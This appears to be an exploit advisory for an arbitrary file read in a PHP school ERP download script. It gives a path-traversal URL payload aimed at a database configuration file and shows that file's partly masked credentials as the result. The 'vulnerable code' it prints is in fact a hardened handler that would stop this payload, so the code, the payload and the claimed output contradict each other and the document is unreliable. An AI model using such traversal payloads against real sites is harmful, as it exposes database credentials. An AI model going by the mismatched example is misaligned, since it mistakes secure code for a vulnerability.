
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
# CVE: N/A
Vulnerable code: (/student_staff/download.php)
- File Name: download.php
- Content of download.php:
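<?php

/**
 * Download handler, hardened: the requested name is confined to one
 * document directory before anything is read or sent.
 */

/**
 * Resolve a user-supplied document name to a file inside $baseDir.
 *
 * Only the basename of the request value is used, so "../" segments and
 * absolute paths cannot point outside the directory, and the result is
 * realpath()-checked so a symlink inside $baseDir cannot lead out of it.
 *
 * @param string $requested the raw value of the "document" parameter
 * @param string $baseDir   directory that holds the downloadable files
 *
 * @return string|null absolute path of an existing regular file, or null
 *                     when the name is empty/invalid, the file does not
 *                     exist, or it resolves outside $baseDir
 */
function resolve_document_path(string $requested, string $baseDir): ?string
{
    // Reject NUL bytes before any filesystem call is made with the value.
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    $root = realpath($baseDir);
    if ($root === false || !is_dir($root)) {
        return null;
    }

    $path = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }

    // Containment check on the resolved path (symlinks already followed).
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $path;
}

if (isset($_REQUEST['document']) && is_string($_REQUEST['document']) && $_REQUEST['document'] !== '') {
    // PLACEHOLDER: set to the directory that actually stores the downloadable documents.
    $documentDir = __DIR__ . '/documents';

    $file = resolve_document_path($_REQUEST['document'], $documentDir);
    if ($file === null) {
        // Unknown or out-of-directory name: answer 404 without revealing why.
        http_response_code(404);
        exit;
    }

    // Send the stored file name, not the raw request value; quotes and
    // control characters are stripped so the header value stays well-formed.
    $downloadName = preg_replace('/["\x00-\x1F\x7F]/', '', basename($file));

    header("Content-type: application/force-download");
    header("Content-Transfer-Encoding: Binary");
    header("Content-length: " . filesize($file));
    header("Content-disposition: attachment; filename=\"" . $downloadName . "\"");
    readfile($file);
    exit;
}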
------------
*Payload:*
---------------
http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
------------------------
*After running the payload (the file content is disclosed):*
------------------------
<?php

// Content of includes/constants.inc.php as disclosed by the request above.
// The credential values are masked ("****") by the advisory author.

define('DB_SERVER', 'localhost');

define('DB_SERVER_USERNAME', 'aroxi********');

define('DB_SERVER_PASSWORD', 'erp**********');

define('DB_DATABASE', 'aroxi****************');

?>